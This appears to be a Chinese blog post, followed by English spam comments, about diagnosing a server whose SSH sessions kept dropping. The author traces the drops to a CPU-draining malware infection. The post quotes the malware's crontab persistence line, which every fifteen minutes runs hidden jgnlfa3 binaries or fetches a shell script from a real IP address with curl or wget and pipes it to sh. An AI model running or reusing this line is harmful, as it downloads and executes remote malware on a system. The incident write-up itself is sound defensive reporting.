近期,发现一台服务器连接上去后,过几分钟就自动断了连接,然后再连接的时候非常的缓慢,就开始查看各种服务日志,一般来说如果频繁断网除了网络问题就是CPU跑爆了或者磁盘IO跑爆了,按照这个思路去查
刚开始以为只是ssh连接慢的问题,查看日志发现果然是有相关的日志
Activation of org.freedesktop.login1 timed out
经过一顿猛如虎的操作,找到是由于dbus的服务重启后,systemd-logind服务没有重启导致,那么就重启了下systemd-logind进程
# systemctl restart systemd-logind
然后过了一会,发现服务器又中断连接了,费了半天劲连接上服务器之后,在执行htop和iostat之后,终于发现一个大大的异常
既然出现问题了,那就so easy的处理了,赶紧查看了crontab、rc.loacl、/usr/bin下各种异常的命令和文件,结果有如下发现:
crontab -l中发现:
*/15 * * * * (/usr/bin/jgnlfa3||/usr/libexec/jgnlfa3||/usr/local/bin/jgnlfa3||/tmp/jgnlfa3||curl -m180 -fsSL http://110.40.14.13:8000/i.sh||wget -q -T180 -O- http://110.40.14.13:8000/i.sh) | sh
/usr/bin中发现jg开头的三个不知名的命令(已经处理完了,忘了留图了)
既然找到了缘由,就该删除的删除,该禁止的禁止,该修补的修补
处理完之后,在观察期间,就分析这个病毒的始作俑者
这个病毒的脚本也很简单,基本上看一看就知道是怎么操作的了,而且/usr/bin/里面的命令都是加密的,没有细细的分析是怎么加密的,也就没有反解密得不到具体是执行的什么命令,目前只知道是跑满CPU,捎带手已经举报这孙子的网站了
If some one desires expert view concerning
running a blog after that i recommend him/her to go to see this weblog, Keep up
the good job.
I will immediately grasp your rss as I can’t to find your email subscription link or e-newsletter service.
Do you’ve any? Kindly allow me understand in order that I could subscribe.
Thanks.
Appreciate this post. Will try it out.
Incredible! This blog looks exactly like my old one! It’s on a totally different subject but it
has pretty much the same page layout and design. Excellent choice of colors!
Can I simply just say what a relief to uncover somebody that genuinely understands what
they’re discussing on the web. You definitely know how to bring an issue to light and
make it important. More people have to read this and understand this side of
the story. I was surprised you are not more popular since you definitely possess the
gift.
What’s up, after reading this awesome post i am as well delighted to
share my familiarity here with colleagues.